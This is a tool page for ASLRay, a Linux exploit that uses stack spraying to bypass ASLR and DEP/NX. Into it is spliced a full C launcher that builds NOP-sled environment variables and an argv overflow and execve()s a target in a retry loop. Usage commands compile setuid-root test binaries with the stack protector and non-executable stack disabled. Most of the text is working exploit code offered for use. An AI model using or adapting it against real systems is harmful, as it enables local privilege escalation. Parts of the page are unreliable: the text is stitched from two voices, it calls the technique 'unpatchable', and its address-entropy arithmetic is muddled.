
ASLRay – Linux ELF x32/x64 ASLR DEP/NX bypass exploits with stack-spraying.

ASLRay is a Linux ELF x32/x64 ASLR DEP/NX bypass exploit with stack-spraying.
Properties:
+ ASLR bypass
+ DEP/NX bypass
+ Cross-platform
+ Minimalistic
+ Simplicity
+ Unpatchable

Dependencies:
– Linux 2.6.12+ – should work on any x86-64 Linux-based OS
– BASH – the whole script is written in it

Limitations:
+ Stack needs to be executable (-z execstack) for x64
+ Binary has to be exploited through its arguments, locally (not through a file, socket or standard input)
+ No support for other architectures and OSes (TODO)
+ The buffer size (how many bytes the overflow has to cross) must be known

How does it work?
You might have heard of heap spraying. Stack spraying is similar, but it was long considered impractical for most cases, especially against ASLR on x86-64.

– For 32-bit, there are 2^32 (4 294 967 296) theoretical addresses, but the kernel randomizes far fewer bits of the stack's position than that, roughly half of them by this estimate (2^(32/2) = 65 536 distinct positions), because the stack is only shifted within a bounded window of virtual memory (on 32-bit x86 about 8 MiB below the top of user space). So if we control more than 50 000 characters on the stack, filled with a NOP sled that ends in our shellcode, a guessed address is almost sure to land inside the sled regardless of where the stack was placed. According to my tests, even 100 or 10 characters are enough.
– This can be achieved using shell (environment) variables, which the shell does not limit to a specific length; the kernel caps a single environment string at MAX_ARG_STRLEN (128 KiB) and the whole argument-plus-environment block at a quarter of the stack rlimit, and the practical limit is about one hundred thousand characters per variable, otherwise it will saturate the TTY.
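The mechanics above, as an added example in C rather than ASLRay's own bash code: it builds the NOP-sled environment variables, builds the argv[1] overflow string, and exec()s the target with both. Everything about the target's layout is an assumption of this example, not something the page states: argv[1] is copied into a fixed stack buffer of buf_len bytes with the saved return address right after it, the placeholder shellcode is a `jmp $` so a hit shows as a hang, and the guessed address (the `guess_hex` argument, e.g. the hypothetical `bfd0a1b2`) is whatever a debugger showed pointing into the sprayed environment on the tester's own machine. It stays with the 32-bit target because an x86-64 user address has zero high bytes that argv cannot carry.

```c
/* Added example, not ASLRay's own code: a minimal 32-bit stack-spray
 * launcher. Assumptions (mine, not the page's): the target copies argv[1]
 * into a fixed stack buffer of buf_len bytes with the saved return address
 * right after it, the spray travels in environment variables, and the
 * guessed address is supplied by the tester. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOP        0x90u
#define SLED_LEN   (100u * 1024u) /* per variable; kernel caps one env string
                                   * at MAX_ARG_STRLEN = 128 KiB */
#define SPRAY_VARS 16u            /* 16 x 100 KiB stays under ARG_MAX, which is
                                   * a quarter of the stack rlimit (2 MiB by
                                   * default) */

/* Placeholder "shellcode": jmp $ (eb fe). A hit shows up as a hang instead
 * of a segfault, which is easy to tell apart from the shell. */
static const unsigned char shellcode[] = { 0xeb, 0xfe };

/* One environment entry "NAME=<NOP sled><shellcode>". Caller frees the
 * result; *out_len (if non-NULL) receives the length without the NUL. */
char *build_spray_var(const char *name, size_t sled_len,
                      const unsigned char *sc, size_t sc_len, size_t *out_len)
{
    size_t name_len = strlen(name);
    size_t total = name_len + 1 + sled_len + sc_len;
    char *var = malloc(total + 1);
    if (!var) return NULL;
    memcpy(var, name, name_len);
    var[name_len] = '=';
    memset(var + name_len + 1, NOP, sled_len);
    memcpy(var + name_len + 1 + sled_len, sc, sc_len);
    var[total] = '\0';
    if (out_len) *out_len = total;
    return var;
}

/* Overflow string for argv[1]: buf_len filler bytes, then the 4-byte
 * little-endian guess repeated `copies` times so the saved return address
 * is overwritten even if the distance to it is off by a few words. argv
 * strings cannot carry NUL bytes, so a guess containing a zero byte is
 * rejected (returns NULL) instead of being silently truncated. */
char *build_payload(size_t buf_len, uint32_t guess, unsigned copies)
{
    unsigned char le[4];
    for (int i = 0; i < 4; i++) {
        le[i] = (unsigned char)(guess >> (8 * i));
        if (le[i] == 0) return NULL;
    }
    size_t total = buf_len + 4u * copies;
    char *p = malloc(total + 1);
    if (!p) return NULL;
    memset(p, 'A', buf_len);
    for (unsigned c = 0; c < copies; c++)
        memcpy(p + buf_len + 4u * c, le, 4);
    p[total] = '\0';
    return p;
}

/* Usage: ./spray <target> <buf_len> <guess_hex>, e.g. ./spray ./test32 1024 bfd0a1b2
 * (the address is hypothetical; use one seen inside the sprayed environment
 * under a debugger on the machine being tested). */
int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "usage: %s <target> <buf_len> <guess_hex>\n", argv[0]);
        return 2;
    }
    size_t buf_len = strtoul(argv[2], NULL, 10);
    uint32_t guess = (uint32_t)strtoul(argv[3], NULL, 16);

    char *envp[SPRAY_VARS + 1];
    for (unsigned i = 0; i < SPRAY_VARS; i++) {
        char name[16];
        snprintf(name, sizeof name, "S%u", i);
        envp[i] = build_spray_var(name, SLED_LEN, shellcode,
                                  sizeof shellcode, NULL);
        if (!envp[i]) { perror("malloc"); return 1; }
    }
    envp[SPRAY_VARS] = NULL;

    char *payload = build_payload(buf_len, guess, 16);
    if (!payload) {
        fputs("guess contains a NUL byte; choose another\n", stderr);
        return 1;
    }
    char *args[] = { argv[1], payload, NULL };
    execve(argv[1], args, envp); /* only returns on failure */
    perror("execve");
    return 1;
}
```

Because the stack base still moves between runs, a fixed guess only lands on some of them: run the launcher in a loop such as `until ./spray ./test32 1024 bfd0a1b2; do :; done`, where a segfault (exit 139) retries and a hit on the `jmp $` placeholder hangs the loop, which is the signal to look for. Dropping the sled below roughly a page, as the page's "even 100 or 10 characters" remark does, lowers the per-run hit rate accordingly and is not something this example relies on.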

Usage:

git clone https://github.com/cryptolok/ASLRay && cd ASLRay
# the 32-bit build needs the multilib libc; as written, a failed install kills the current shell
apt install gcc libc6-dev-i386 || kill -9 $$
chmod u+x ASLRay.sh
# build the test targets as root so the setuid bit below is meaningful; x64 needs an executable stack
sudo gcc -z execstack test.c -o test
sudo gcc -m32 -z execstack test.c -o test32
sudo chmod +s test test32
# second argument: the buffer size the overflow has to cross
source ASLRay.sh test32 1024
source ASLRay.sh test 1024
# optional third argument: your own shellcode as escaped bytes
source ASLRay.sh test 1024 \x31\x80...your_shellcode_here
# 32-bit target without an executable stack (the x32 case does not need -z execstack, see Limitations)
sudo gcc -m32 test.c -o test32x
sudo chmod +s test32x
source ASLRay.sh test32x 1024

For Arch/Ubuntu (their gcc enables the stack protector by default, so it has to be disabled for the test binaries):
sudo gcc -z execstack -fno-stack-protector test.c -o test
sudo gcc -m32 -z execstack -fno-stack-protector test.c -o test32
sudo gcc -m32 -fno-stack-protector test.c -o test32x

Source: https://github.com/cryptolok

